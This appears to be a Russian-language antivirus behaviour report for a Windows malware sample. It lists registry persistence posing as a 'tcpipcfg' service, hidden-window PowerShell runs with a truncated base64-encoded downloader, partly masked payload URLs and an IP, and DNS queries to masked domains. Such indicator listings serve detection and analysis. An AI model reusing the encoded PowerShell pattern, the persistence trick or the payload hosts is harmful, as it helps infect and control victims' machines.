Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\tcpipcfg] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\tcpipcfg] 'ImagePath' = '"%WINDIR%\SysWOW64\findstr\tcpipcfg.exe"'
- 'tcpipcfg' "%WINDIR%\SysWOW64\findstr\tcpipcfg.exe"
- 'tcpipcfg' %WINDIR%\SysWOW64\findstr\tcpipcfg.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABvAEQAYwAwAG4AaQA9ACAAWwBUAHkAcABFAF0AKAAiAHsAMQB9AHsANAB9AHsAMgB9AHsAMwB9AHsAMAB9ACIALQBmACcAdABvAHIAeQAnACwAJwBTACcALAAnAE8ALgBEAGkAcgAnACwAJwBFAGMAJwAsACcAWQBTAFQARQ...
- %HOMEPATH%\aub_1bg\gtm_8eb\ny8kv9.exe
- %HOMEPATH%\aub_1bg\gtm_8eb\ny8kv9.exe
- %HOMEPATH%\aub_1bg\gtm_8eb\ny8kv9.exe в %WINDIR%\syswow64\findstr\tcpipcfg.exe
- %HOMEPATH%\aub_1bg\gtm_8eb\ny8kv9.exe
- '19#.#45.25.228':80
- http://qu####owtowing.com/indexing/N2/
- http://te###lora.com/grup-bo/NWd/
- http://19#.#45.25.228/cxSY8j/tyuTHEIuYDcO0iayR8/Y4GM4OHjF1FV/
- DNS ASK sa#####rcesupports.com
- DNS ASK sa####pharma.com
- DNS ASK la####line88.com
- DNS ASK qu####owtowing.com
- DNS ASK te###lora.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABvAEQAYwAwAG4AaQA9ACAAWwBUAHkAcABFAF0AKAAiAHsAMQB9AHsANAB9AHsAMgB9AHsAMwB9AHsAMAB9ACIALQBmACcAdABvAHIAeQAnACwAJwBTACcALAAnAE8ALgBEAGkAcgAnACwAJwBFAGMAJwAsACcAWQBTAFQARQ...' (со скрытым окном)